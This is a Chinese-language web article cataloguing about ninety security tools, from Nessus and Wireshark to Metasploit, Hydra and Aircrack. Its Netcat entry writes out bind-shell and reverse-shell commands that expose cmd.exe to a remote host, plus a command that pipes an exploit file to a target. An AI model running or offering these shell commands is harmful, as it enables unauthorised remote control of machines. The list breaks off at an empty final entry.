积木网络
一、Nessus
是扫描UNIX漏洞的主力工具,随后栖身Windows。主要功能包括本地和远程安全审查,支持client/server结构,具有GTK图形界面,并支持脚本语言编写插件。属免费开源。
二、Wireshark
说起Wireshark,不得不提Ethereal,Ethereal和Windows的sniffer pro并称网络嗅探工具双雄,不过和sniffer pro不同的是Ethereal在Linux类系统中应用更为广泛。而Wireshark则是Ethereal后续版本,是在Ethereal被收购后推出的最新网络嗅探软件,是功能强大的网络数据捕获工具,可分析网络数据流量,在第一时间发现蠕虫病毒,木马程序以及ARP欺骗等问题的根源。
三、Snort
Snort免费跨平台,用作监视小型TCP/IP网的嗅探器、日志记录、侵入探测器。可运行linux/UNIX和Win,snort有三种工作模式:嗅探器、数据包记录器、网络入侵检测系统。
嗅探器模式是snort从网络上读出数据包然后显示控制台上。例如要把TCP/IP包头信息打印在屏幕上,需要输入命令:snort -v
四、Netcat
netcat被誉为‘瑞士军刀',一个简单有用的工具,透过使用TCP或UDP协议的网络连接读写数据。它被设计成一个稳定的后门工具,是一个功能强大的网络调试和探测工具。
1)例子:连到192.168.x.x的TCP80端口的命令:nc -nvv 192.168.x.x 80
2) 监听本机的TCP80端口: nc -l -p 80
3) 扫描192.168.x.x的TCP80到TCP445的所有端口: nc -nvv -w2 -z 192.168.x.x 80-445
4) 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口REMOTE主机绑定SHELL: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
5)REMOTE主机绑定SHELL并反向连接,例如:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口的命令:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6)作攻击程序用,例子:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'内容:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
7)作蜜罐用,例子:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
格式:nc -L -p 80
五、Metasploit Framework
是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。
六、Hping2
Hping2:一种网络探测工具,是ping的超级变种,这个小工具可以发送自定义的ICMP,UDP和TCP数据包,并接收所有反馈信息。例如可以设置时间间隔,数据包发送的频率(-i uX X为微秒),命令为:hping2 192.168.0.1 -c 2 -i u1000
七、Kismet
Kismet是一个基于Linux的无线网络扫描程序,一个相当方便的工具,通过测量周围无线信号找到目标WLAN。当Kismet开始运行时,将会显示这个区域内它找到所有的无线局域网,“Name”列中所显示出来的就是WLAN中AP的SSID值,开始设定的目标WLAN也应该包含中其中,在这一行中,CH列的值(AP所使用的频道)应该与开始所记下的相同。在窗口的最右边显示的信息是Kismet发现的WLAN的数目,已被捕捉下来了的数据包、已加密了的数据包的数目等等。甚至当目标计算机已关闭时,Kismet也正可从我们的目标AP中检测到数据包,这是因为目标AP在不停地发出“beacons”,它将告之拥有无线网卡的计算机有一个AP在此范围内。
八、Tcpdump
基于linux 的TcpDump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。tcpdump就是一种免费的网络分析工具,尤其其提供了源代码,公开了接口,因此具备很强的可扩展性,对于网络维护和入侵者都是非常有用的工具。
九、Cain and Abel
是一款Windows平台下的口令恢复工具。它通过采用多种方式来恢复多种口令,采取方式包括:嗅探网络,使用字典、暴力、密码分析方法破解解密口令,记录VoIP会话,解码混杂口令,恢复无线网络密钥,揭示口令框中输入的口令(星号查看),披露缓冲口令和分析路由协议。这个工具没有利用任何软件漏洞或缺陷,它利用了协议标准、认证方法和缓冲机制本身存在的安全问题以及内在的弱点,其主要目的是简单地恢复多种程序的口令和凭证。该软件由两部分组成:Cain和Abel。Cain(Cain.exe)是程序的主图形界面,Abel是一个Windows服务,由文件Abel.exe和Abel.dll组成。
十、John the Ripper
用于在已知密文的情况下尝试破解出明文的破解密码软件。目前的最新版本是 JOHN 1.4 版, 主要支持对 DES、 MD5 两种加密方式的密文进行破解工作。 它可以工作于多中不同 的机 型 以及多种不同的操作系统。
十一、Ettercap
Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。Ettercap有5种sniffing工作方式:
(1)IPBASED:基于IP地址的sniffing方式,Ettercap根据源IP-PORT和目的IP-PORT来捕获数据包。
(2)MACBASED: 基于MAC地址的方式,Ettercap将根据源MAC和目的MAC来捕获数据包。
(3) ARPBASED : 基于ARP欺骗的方式下,Ettercap利用ARP欺骗在交换局域网内监听两个主机之间的通信(全双工)。
(4) SMARTARP: 在SMARTARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有已知的其他主机(存在于主机表中的主机)之间的通信(全双工)。
(5) PUBLICARP : 在PUBLICARP方式下,Ettercap利用ARP欺骗,监听交换网上某台主机与所有其它主机之间的通信(半双工)。
十二、Nikto
Nikto 是一款开放源代码的、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库,但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。
十三、Ping/telnet/dig/traceroute/whois/netstat:最基本的安全命令。
十四、OpenSSH / PuTTY / SSH
SSH(Secure Shell)现在普遍应用于登录远程计算机或在其上执行命令。为不安全网络上的两台不互信计算机间通讯提供安全加密,代替非常不可靠的telnet/rlogin/rsh交互内容。大多unix使用开源的OpenSSH服务器和客户端程序。Windows用户更喜欢免费的PuTTY客户端,也可以运行在多种移动设备上。还有一些windows用户喜欢使用基于终端的OpenSSH模拟程序Cygwin。
十五、THC Hydra
如果某人需要暴力破解一个远程认证服务,Hydra经常会是选择对象。它可以同时对30个以上的端口进行基于字典的快速破解,包括telnet、ftp、http、https、smb、多种数据库及其它服务。和THC Amap一样,Hydra来自于民间组织THC。
十六、Paros proxy
proxy是架设在攻击者的浏览器和目标网站中间,所有的要求和回应都会被送到,藉此骇客得以仔细研究这些封包资讯,包括在网页传送中的、 变数,并可以修改这些变数后再送出。proxy功能齐全,具备网站弱点扫描和侦测能力,对一些常见的网页应用程式攻击,都可进行检测,甚至能够检测出不安全的网页元件。
十七、Dsniff
Dsniff是一个高级的口令嗅探器,是第一批扩展了传统Sniffer概念的监听工具,将制造的数据包注入网络,并将通信数据重新定向到攻击者的机器。在这种方式下,Dsniff允许攻击者在交换环境的网络内窃听数据,甚至在攻击者和攻击目标不在同一个Lan,也能使攻击者收集到想要的数据。支持telnet 、ftp、smtp、pop、imap、http应用协议。 十八、NetStumbler
NetStumbler 是一款专门用来寻找无线AP的工具,是目前最流行的无线搜寻工具。开启后能自动显示附近探测到的无线AP,并能显示这些无线AP的SSID、MAC地址、频段、速度、是否加密等信息。值得一提的是,NetStumbler可以显示设置了隐藏SSID的无线AP,在软件界面中可以看到该AP的绿灯在不断闪烁。在树状结构中列出了各频段检测到的无线AP。由于NetStumbler进行全面扫描,所以附近无线AP将一览无余。因为它是美国人开发的,所以只能检测1~11之间的11个频段,而国内无线频段分为13个频段,12~13频段的无线AP将无法搜寻到。
十九、THC Amap
它可以检测出某一端口正在被什么程序监听。因为其独有的version detection特性,所以其数据库不会象Nmap一样变得很大,在Nmap检测某一服务失败或者其它软件不起作用时可以考虑使用之。Amap的另一特性是其能够解析Nmap输出文件。这也是THC贡献的另一款很有价值的工具。
二十、GFI LANguard
企业网络漏洞管理的三大主要问题:网络扫描、网络审计和补丁管理。GFI LANguard Network Security Scanner (N.S.S.) 是一项屡获殊荣的解决方案,能够扫描、检测、评估和修复网络中的任何安全漏洞。作为管理员您经常需要处理各种不同的问题,有时会使用多种产品分别处理与网络漏洞、补丁管理和网络审计相关的问题。使用 GFI LANguard N.S.S.,漏洞管理的三大主要问题可以通过带有丰富报告功能的单个控制台得以解决。/post/732.html
二一、Aircrack
Aircrack是一套用于破解8WEP和WPA的工具套装,一般用于无线网络的密钥破解,从而非法进入未经许可的无线网络。只要一旦收集到足够的加密数据包,利用它就可以破解40到512位的WEP密匙,也可以通过高级加密方法或暴力破解来破解WPA1或2网络。
二二、Superscan
SuperScan 是由Foundstone开发的一款免费的,但功能十分强大的工具,与许多同类工具比较,它既是一款黑客工具,又是一款网络安全工具。一名黑客可以利用它的拒绝服务攻击(DoS,denial of service)来收集远程网络主机信息。而做为安全工具,SuperScan能够帮助你发现你网络中的弱点。
二三、Netfilter
通俗的说,netfilter的架构就是在整个网络流程的若干位置放置了一些检测点(HOOK),而在每个检测点上上登记了一些处理函数进行处理(如包过滤,NAT等,甚至可以是用户自定义的功能)。
二四、Sysinternals
Sysinternals属于一套安全管理套件,主要包括:
(1)Process Explorer:进程管理工具,可以设置为完全取代系统自带任务管理器taskmgr,成为系统默认的“任务管理器”。里头的各种监视器非常直观地监视或者记录着系统当前的状态,而且易用性非常高。支持XP及Win2003以上系统。
(2)PsTools:一共由12个命令组成,可以用来远程管理Windows NT/2000/XP系统。可以远程整理硬盘、关闭远程计算机上运行的信使服务、查看服务器硬盘空间、查看远程计算机上的进程,并结束可疑进程、发送消息并快速关闭远程计算机等。
(3)Autoruns:强大、完整的启动项扫描工具!
(4)TCPView:检测端口的软件,很小很好用。
(5)RootkitRevealer:可以用来检测系统Windows系统里边是否运行着Rootkit,它通过分析注册表和系统API文件差异,能检测出来www.rootkit.com发布的所有rootkit,包括AFX、Vanquish、HackerDefender 等(注意:RootkitRevealer是不能够检测那些没有隐藏文件和注册表的Rootkit,比如FU_Rootkit)。
二五、Retina
Retina 已经被业界认为是最精确的非嵌入式网络安全扫描器,它包含有最全面的安全漏洞数据库,该数据库由eEye公司的研发队伍所维护。作为一个同时面向分布式企业用户和单机网络环境用户的专业安全软件,Retina已经被许多世界上最大的公司和政府部门使用。他们用于检测各个分公司/总公司/政府部门的网络安全,矫正网络中隐藏的漏洞和不安全的设置。
二六、Perl / Python / Ruby
perl比ruby或者python都要古老些。perl曾经是最流行的脚本语言,曾经也被认为是黑客必备。可以只用几行就完成复杂数据的处理,而且速度不必同样的c慢许多,内置的对正则表达式和数据结构的支持更是令人惊叹。 以前许多网站都用perl写的。即使现在,国外有些较老的网站也有部分代码还是perl。perl最强大之处在于它有数不清的库支持,perl可是说有着世界上最大的社区,你想做什么事情都找得到相应的库。但是perl的缺点也很明显:perl的程序实在是太灵活了,一个问题通常有非常多的解决方案,正如一句话有非常多的说法一样,而且perl的语法对于不熟悉它的人完全是天书。ruby和python都是作为perl的替代者出现的。最新的perl加入了对面向对象的支持,ruby和python对面向对象的支持更好(甚至要好于java)。
二七、L0phtcrack
L0phtCrack v5.04,简称LC 5,这是一款网络管理员的必备的工具,它可以用来检测Windows、UNIX 用户是否使用了不安全的密码,同样也是最好、最快的Win NT/2000/XP/UNIX 管理员帐号密码破解工具。事实证明,简单的或容易遭受破解的管理员密码是最大的安全威胁之一,因为攻击者往往以合法的身份登陆计算机系统而不被察觉。
二八、Scapy
Scapy是一款强大的交互式数据包处理工具、数据包生成器、网络扫描器、网络发现工具和包嗅探工具。它提供多种类别的交互式生成数据包或数据包集合、对数据包进行操作、发送数据包、包嗅探、应答和反馈匹配等等功能。
二九、Sam Spade
SamSpade提供了一个友好的GUI界面,能方便地完成多种网络查询任务,它开发的本意是用于追查垃圾邮件制造者,但也能用于其它大量的网络探测、网络管理和与安全有关的任务,包括ping、nslookup、whois、dig、traceroute、finger、raw HTTP web browser、DNS zone transfer、SMTP relay check、website search等工具,是一个集成的工具箱。
三十、GnuPG / PGP
随着网络与计算机技术的发展,数据存储与数据交换的安全性已经变得越来越重要,加密技术已经很早就用于数据存和数据交换。为了确保网络数据交换时的双方身份的正确性,签证体系也已经成熟。GnuPG就是用来加密数据与制作证书的一套工具,其作用与PGP类似。但是PGP使用了许多专利算法。
三一、Airsnort
这个程序利用被使用相当普及、根据一般标准设计的网络加密系统“Wi-fi”(或称为802.11b)的缺点进入网络,但另一种加密系统则尚未被AirSnort 或WEPCrack 攻破。设计AirSnort的人相信,许多网络用户都不重视或无法了解有关Wi-fi加密系统的瑕疵。
三二、BackTrack
BackTrack是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而创建成的。
三三、P0f
p0f 是继Nmap和Xprobe2之后又一款远程操作系统被动判别工具。它支持:反连SYN 模式、正连SYN+ACK 模式、空连RST+ 模式、碎片ACK模式。它还可以探测:是否运行于防火墙之后、是否运行于NAT模式、是否运行于负载均衡模式、远程系统已启动时间、 远程系统的DSL和ISP信息等。
三四、Google:人见人爱的搜索引擎。
三五、WebScarab
一款代理软件 包括代理,网络爬行、网络蜘蛛,会话分析,自动脚本接口,模糊测试工具,对所有流行的格式的编码/解码,服务描述语言和解析器等。
三六、Ntop
NTOP可以把端口使用情况与应用程序关联起来,这和使用“netstat -an”命令的效果类似,并且可以显示端口打开时间、端口流量等详细信息。比如,可以把本机开放的TCP/UDP端口同应用程序关联起来。
三七、Tripwire
是目前最为著名的unix下文件系统完整性检查的软件工具,这一软件采用的技术核心就是对每个要监控的文件产生一个数字签名,保留下来。当文件现在的数字签名与保留的数字签名不一致时,那么现在这个文件必定被改动过了。
三八、Ngrep
ngrep 是grep(在文本中搜索字符串的工具)的网络版,力求更多grep特征,用于搜寻指定的数据包。正由于安装ngrep需用到libpcap库, 所以支持大量的操作系统和网络协议。能识别TCP、UDP和ICMP包,理解bpf的过滤机制。
三九、Nbtscan
一个扫描WINDOWS网络NetBIOS信息的小工具,但只能用于局域网,可以显示IP,主机名,用户名称和MAC地址等等。
四十、WebInspect
被认为是下一代Web 应用程序安全性测试工具,主要功能介绍:(1)利用创新的评估技术检查 Web 服务及 Web 应用程序的安全;(2)自动执行 Web 应用程序安全测试和评估;(3)在整个生命周期中执行应用程序安全测试和协作;(4)通过最先进的用户界面轻松运行交互式扫描;(5)利用高级工具 (HP Security Toolkit) 执行渗透测试;(6)配置以支持任何 Web 应用程序环境。
四一、OpenSSL
SSL是Secure Socket Layer(安全套接层协议)的缩写,可以在Internet上提供秘密性传输。OpenSSL整个软件包可分成三个主要的功能部分:密码算法库、SSL协议库以及应用程序。
四二、Xprobe2
Xprobe2通过模糊矩阵统计分析主动探测数据报对应的ICMP数据报特征,进而探测得到远端操作系统的类型。
四三、EtherApe
网络嗅探器,能够完成与Tcpdump相同的功能,但操作界面要友好很多。Ehtereal和Tcpdump都依赖于pcap库(libpcap),因此两者在许多方面非常相似(如都使用相同的过滤规则和关键字)。Ethereal和其它图形化的网络嗅探器都使用相同的。
四四、Core Impact
公认最强漏洞检测工具,全面评估侦测,防止和应对信息安全威胁。由安全地复制真实世界的攻击网络服务器和工作站,最终用户的系统,以及Web应用程式,可协助寻找并修复安全问题。
四五、IDA Pro
是一个交互“分析员”,然而并不自动解决问题,IDA Pro 会发现指令可疑之处,并不去解决这些问题。您的工作是通知 IDA 怎样去做。
四六、SolarWinds
一个专业的网络管理软件,可以监控,发现网络设备。包括以下工具:
1. 网络性能监控(Network Performance Monitoring):带宽测量、路由CPU负荷、带宽监控、CPU测量、网络性能监控器、SNMP图象和高级CPU上传。
2. 网络发现(Network Discovery):子网列表、Ping Sweep、和IP网络浏览器、DNS核查、IP地址管理、MAC地址发现、SNMP Sweep、网络定位。
3. 用于Cisco网络的工具:IP网络浏览器、路由CPU负荷、配置下载、配置上传、配置编辑器/浏览器、Proxy Ping、对比运行VS启动配置、路由器密码加密术、CPU测量(、路由器安全检查和高级CPU上传。
4. 网络监控:Watch It!、网络监控器、Syslog 服务器、路由CPU负荷、高级ping和网络性能监控器。
5. IP地址管理(IP Address Management ):先进的子网计算器、DNS / Who Is Resolver、DHCP Scope Monitor、DNS核查、IP地址管理、Ping Sweep。
6. 安全性(Security):路由安全性检查、TCP Reset、字典编辑器、SNMP Brute Force 攻击、SNMP词典攻击、路由器密码加密术。
7. Ping & Diagnostic :ping、高级ping、Trace Route、Proxy Ping、Ping Sweep。
8. MIB浏览器:MIB Walk、更新系统MIBs、MIB浏览器、MIB浏览器和SNMP图象。
9. 其它:TFTP服务器、WAN Killer、Wake-On-Line。
四七、Pwdump:一个用来抓取Windows用户密码文档的工具。
四八、LSoF
全名list opened files,也就是列举系统中已经被打开的文件。我们知道,linux环境中任何事物都是文件,设备是文件,目录是文件,甚至sockets也是文件。所以,用好lsof命令,对日常linux管理非常有帮助。
四九、RainbowCrack
一个多功能密码破解软件,不仅能够破解密码,同时也是杂乱算法加密的破解利器。比如可破解im,md5,sha1,customizable等,其它加密方式破解也可添加到该软件中。软件同时支持Windows和Linux系统,而且在一个系统上生成的表单可以直接转换到另一种系统上使用,它功能虽然强大,但使用较复杂。
五十、Firewalk
Linux网络安全工具,使用类似traceroute技术来分析IP包响应,从而测定网关访问控制列表和绘制网络图的工具。
五一、Angry IP Scanner
一款使用方便的 IP、端口扫描工具,可获得被扫描计算机的ping响应时间、主机名称、计算机名称、工作组、登录用户名、MAC地址、TTL、NetBios 信息等;也可指定扫描端口,查看目标计算机开放端口的情况;对于活动主机,可执行在资源管理器中打开、利用网页浏览器浏览、FTP、telnet、ping、tracert 或利用网页查找指定 IP 的地理位置等操作。只需一个网址或主机名称,Angry IP Scanner 就能自动解析其 IP 地址并进行扫描。Angry IP Scanner 还支持自动选取并扫描整个 B 类和 C 类 IP 段,对常用 IP 进行收藏管理,导出扫描结果为多种文件格式等。由于采用多线程扫描,Angry IP Scanner 可以同时对几十个 IP 发起扫描,因此速度极快。
五二、RKHunter
中文名”Rootkit猎手”, 可发现大约58个已知rootkits和一些嗅探器和后门程序. 它通过执行一系列的测试脚本来确认机器是否已感染rootkits。
五三、Ike-scan
一款检测IKE(Internet Key Exchange)服务传输特性的工具,IKE是VPN网络中服务器和远程客户端建立连接的机制。在扫描到VPN服务器IP地址后,将改造过的IKE数据包分发给VPN网中的每一主机。只要是运行IKE的主机就会发回反馈来证实其存在。此工具然后对这些反馈数据包进行记录和显示,并将它们和一系列已知VPN产品指纹进行对比。
五四、Arpwatch
ARP(Address Resolution Protocol)是用来解析IP与网络装置硬件地址的协议。在linux系统下arpwatch可监听区域网络中ARP数据包并记录,同时将监听到的变化通过E-mail来报告。
五五、KisMAC
一款免费的无线协议嗅探程序,可用于Mac OX操作系统。KisMAC应用程序在安装时不安全更改文件权限,本地攻击者可以利用这个漏洞未授权访问敏感文件信息。
五六、OSSEC HIDS
一款开源入侵检测系统,包括了日志分析,全面检测,rook-kit检测。作为一款HIDS,OSSEC应该被安装在一台实施监控的系统中。另外有时不需要安装完全版本OSSEC,如果有多台电脑都安装了OSSEC,那么就可以采用客户端/服务器模式来运行。客户机通过客户端程序将数据发回到服务器端进行分析。在一台电脑上对多个系统进行监控对于企业或者家庭用户来说都是相当经济实用的。OSSEC最大优势在于它几乎可以运行在任何一种操作系统上,比如Windows, Linux, OpenBSD/FreeBSD 以及 MacOS。不过运行在Windows的客户端无法实现root-kit检测,而其他系统上客户端都没有问题。
五七、Openbsd PF
OpenBSD用户最爱用PF,这就是他们的防火墙工具。功能有网络地址转换、管理TCP/IP通讯、提供带宽控制和数据包分级控制。它还有一些额外功能,例如被动操作系统检测。PF是由编写OpenBSD的同一批人编写的,它已经过了很好评估、设计和编码以避免暴露其它包过滤器(other packet filters)上的类似漏洞。
五八、Nemesis:几乎可以用来构造任何类型的ICMP数据包。
五九、Tor
Tor(The Onion Router)是第二代洋葱路由(onion routing)的一种实现,用户通过Tor可以在因特网上进行匿名交流。最初该项目由美国海军研究实验室(US Naval Research Laboratory)赞助。Tor专门防范流量过滤、嗅探分析,使用户免受其害。Tor在由“onion routers”(洋葱路由器)组成的表层网(overlay network)上进行通讯,实现匿名对外连接、匿名隐藏服务。
六十、Knoppix
KNOPPIX是一套光盘启动的GNU/Linux系统(LiveCD),功能包括:自动硬件监测、支持常见的显卡、声卡、SCSI和USB设备,以及其它外设。KNOPPIX可用于Linux演示、光盘教学、系统急救,经过适当改造,还可以用于商业软件的产品演示。KNOPPIX采用了特殊的解压缩技术,不需要硬盘安装,一张CD,就容纳了2GB的可执行程序,供用户自由使用。
六一、ISS Internet Scanner
是由Christopher Klaus在92年编写的一款开源的扫描器工具。现在这款工具已经演变成了一个市值上亿美元生产无数安全产品的公司。
六二、Fport
一个用来列出系统中所有打开TCP/IP和UDP端口,以及它们对应应用程序完整路径、PID标识、进程名称等信息的软件。在命令行下使用。
六三、chkrootkit
一款小巧易用的Unix平台上的可检测多种rootkit入侵的工具。功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗、恶意核心模块。
六四、SPIKE Proxy
一款开源的以发现网站漏洞为目的的HTTP代理。是Spike Application Testing Suite的一部分,功能包括自动SQL注入检测、网站爬行(web site crawling)、登录列表暴力破解、溢出检测和目录游走检测。
六五、OpenBSD
OpenBSD是一个从NetBSD衍生出来的类Unix操作系统。OpenBSD包含了一些在其他操作
系统缺少或是选择性安全功能,此外OpenBSD极度重视程式码的品质,任何对核心的修改都需要经过严格的审查。OpenBSD可以在17种不同的硬体环境下运作,包含DEC Alpha、Intel
i386、Hewlett-Packard PA-RISC、AMD64、Motorola 68000、PowerPC、Sun SPARC等。
六六、Yersinia
一个专门为二层攻击所开发的一个工具。当前版本能够对下面所提到的协议所实施:
STP,VLAN Trunk协议,HSRP,DTP,802.1Q,CDP,DHCP,和ISL协议。一些攻击可能会引
起网络中的DOS出现,其它的攻击有助于更高级的攻击,或者两者都会出现。除此之外,
一些其它的攻击被首次向大众发布。
六七、Nagios
一个监视系统运行状态和网络信息的监视系统。Nagios能监视所指定的本地或远程主机
以及服务,同时提供异常通知功能等。Nagios可运行在Linux/Unix平台之上,同时提供一个可选的基于浏览器的WEB界面以方便系统管理人员查看网络状态,各种系统问题,以及日志等等。
六八、Fragroute/Fragrouter
一款网络入侵检测逃避工具集。Fragrouter 是一款单向分段路由器,发送(接收)IP数据包都是从攻击者到Fragrouter,将数据包转换成分段数据流发给受害者。很多入侵检测系统都不能重建一段被视为一个整体的网络数据(通过IP分段和TCP流重组)。Fragrouter可以帮助骇客在逃避入侵检测后发起基于IP的攻击,是Dug Song出品的NIDSbench套装中的一部分。
六九、X-scan
X-Scan把扫描报告和安全焦点网站相连接,对扫描到的每个漏洞进行“风险等级”评估,并提供漏洞描述、漏洞溢出程序,方便网管测试、修补漏洞. 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式。扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息等。
七十、Whisker/libwhisker
Rain.Forest.Puppy出品的CGI漏洞扫描器和漏洞库 Libwhisker是一款Perl模板集用来测试HTTP。它的功能是测试HTTP服务器上是否存在许多已知的安全漏洞,特别是CGI漏洞。Whisker是一款基于libwhisker的扫描器,但是现在大家都趋向于使用Nikto,它也是基于libwhisker的。
七一、Socat
一个netcat(nc)的替代產品。socat的特点是在兩个流之间建立一个双向通道。socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。看一个例子:
c:\>socat - tcp:192.168.1.18:80
该命令等同于 nc 192.168.1.18 80。 Socat里面必須有兩个流,所以第一个参数代表标准I/O,第二个流連接到192.168.1.18的80端口。
七二、Sara
本工具可批量查询网站链接站点IP地址、服务器物理地址,帮助站长清楚了解友情链接的服务器物理定位。
七三、QualysGuard
一个基于推理的扫描引擎,含有5000种以上的单一漏洞检查,且漏洞知识库自动天天升级。由于是在网站上以服务形式发布, 所以QualysGuard没有开发维护和升级漏洞管理软件或ad-hoc安全应用程序方面的负担。
七四、ClamAV
Clam AntiVirus (ClamAV)是一款 UNIX 开源 (GPL) 反病毒工具包,专为邮件网关的电子邮件扫描而设计。提供了包含灵活且可伸缩的监控程序、命令行扫描程序以及用于自动更新数据库的高级工具在内的大量实用程序。该工具包的核心在于可用于各类场合的反病毒引擎共享库。
七五、cheops / cheops-ng
含有主机/网络发现功能,也就是主机操作系统检测。Cheops-ng用来探查主机上运行的服务。针对某些服务可探查到运行服务的应用程序是什么及程序版本号。Cheops已经停止开发和维护,所以最好使用cheops-ng。
七六、Burpsuite
一个免费的网站攻击工具。包括proxy、spider、intruder、repeater四项功能。该程序使用Java写成,需要 JRE 1.4 以上版本。
七七、Brutus
针对Windows远程密码破解工具,可破解HTTP、FTP、POP3、Telnet、SMB等密码。其公布后下载使用人数超过700000次,并且访问Brutus页面超过1750000次。在后面发展中,它不断完美,成为功能强大的密码破解工具。它最初只是开发者用来检测和找回密码所用。免费、功能强大,使其迅速发展,在密码破解软件中一直给予极高评价。
七八、Unicornscan
一款通过尝试连接用户系统(User-land)分布式TCP/IP堆栈获得信息和关联关系的端口扫描器。它试图为研究人员提供一种可以刺激TCP/IP设备和网络并度量反馈的超级接口。主要功能包括带有所有TCP变种标记的异步无状态TCP扫描、异步无状态TCP标志捕获、通过分析反馈信息获取主动/被动远程操作系统、应用程序、组件信息。它和Scanrand一样都属另类扫描器。
七九、Stunnel
Stunnel 是一个程序,可用 OpenSSL 库对任意 TCP 会话进行加密;它作为服务器运行在程序外部。Stunnel 服务器主要执行两个功能:一,首先,接收未加密的数据流进行 SSL 加密,然后将其通过网络发送;二,对已进行 SSL 加密的数据流进行解密,并将其通过网络发送给另一个程序(该程序通常驻留在同一机器上,以避免本地网络上的窥探攻击)。
八十、Honeyd
一个用于搭建虚拟蜜罐与蜜罐网络的轻量级守护进程,可模拟几乎任何类型的应用层服务与任何发行版的操作系统,是目前世界上最流行的蜜罐/蜜网程序。Honeyd 是一个能在网络上创建虚拟主机的小小后台程序,虚拟主机能被配置成运行任意的服务,并且恰当的服务TCP特性以致它们看起来就像是运行在某个特定版本的操作系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址,并可对虚似主机进行ping、traceroute。虚拟主机上任何类型服务都可依照一个简单配置文件进行模拟。Honeyd也可对一台主机做代理服务,而不是模拟它。所有这些功能其实就是在机器上为黑客设置的一个陷井(蜜罐),从而有力地保护了主机,有利于跟踪黑客行踪。Honeyd有Win和Linux版本。
八一、Fping
UNIX和Windows环境都有许多可用来进行ICMP ping扫描的工具。fping是UNIX环境里久经考验的ping扫描工具之一。早期ping扫描工具大都需要等待前一个被探测主机返回某种响应消息之后才能继续探测下一台主机是否存在,但fping却能以轮转方式并行地发出大量的ping请求。这么一来,用fping工具去扫描多个IP地址速度要比ping快很多。
八二、BASE:OpenOffice.org的套件之一,功能类似于微软Office的Access。
八三、Argus
一款固定模型的实时流量监视器,用来跟踪和报告数据网络通讯流中所有事务状态和性能。Argus为流量评估定制了一种数据格式,包括连通性、容量、请求、丢包、延迟和波动,这些就作为评估事务的元素。这种数据格式灵活易扩展,支持常用流量标识和度量,还可获得指定的应用程序/协议信息。
八四、Wikto
一款基于C#编写的Web漏洞扫描工具,因为是完全开源,对于有意编写此类工具的人来说是非常好的参考工具。功能包含了Web爬虫、GoogleHack、Web服务器漏洞扫描等等。与Wikto类似的一款开源Web漏洞扫描工具是Nikto,不过它是基于Perl的。对于.NET开发者来说,Wikto是不可多得的成熟的开源Web安全审计工具。
八五、Sguil
由network security analysts出品的网络安全分析工具。主要组件是一个Snort/ barnyard实时事件显示界面。还包含一些网络安全监控辅助工具和事件驱动入侵检测系统分析报告。
八六、Scanrand
一款类似Unicornscan的无状态主机发现和端口扫描工具。它以降低可靠性来换取异常快的速度,还用了加密技术防止黑客修改扫描结果。此工具是Dan Kaminsky出品的Paketto Keiretsu的一部分。
八七、IP Filter
目前比较流行的防火墙软件,它目前拥有多种平台版本(包括FreeBSD、NetBSD、Solaris、IRIX、HP-UX、Linux、OpenBSD等),且功能强大,安装配置相对较简单。IPfilter可有两套规则,活动规则和不活动规则。默认情况下所有的操作都是基于活动规则。可用ipf -I来使用不活动规则。这两套规则可以用参数-s进行转换。
八八、Canvas
是Aitel's ImmunitySec出品的一款安全漏洞检测工具。包含150个以上的漏洞利用。对于渗透测试人员来说,Canvas是比较专业的安全漏洞利用工具。Canvas 也常被用于对IDS和IPS的检测能力的测试。Canvas工具支持的安装平台有Windows、Linux、MacOSX、其它Python 环境(移动手机、商业Unixs)。有些平台下只能通过命令行操作方式,有些可以通过GUI界面来操作使用。Canvas工具在兼容性设计比较好,可使用其它团队研发的漏洞利用工具,例如使用Gleg, Ltd's VulnDisco 、the Argeniss Ultimate0day 漏洞利用包。
八九、VMware
VMWare是真正“同时”运行,多个操作系统在主系统的平台,就象标准Windows应用程序那样切换。且每个操作系统都可以进行虚拟分区、配置而不影响真实硬盘的数据,你甚至可以通过网卡将几台虚拟机用网卡连接为一个局域网,极其方便。安装在VMware操作系统性能上比直接安装在硬盘上的系统低不少,因此,比较适合学习和测试。
九十、Tcptraceroute
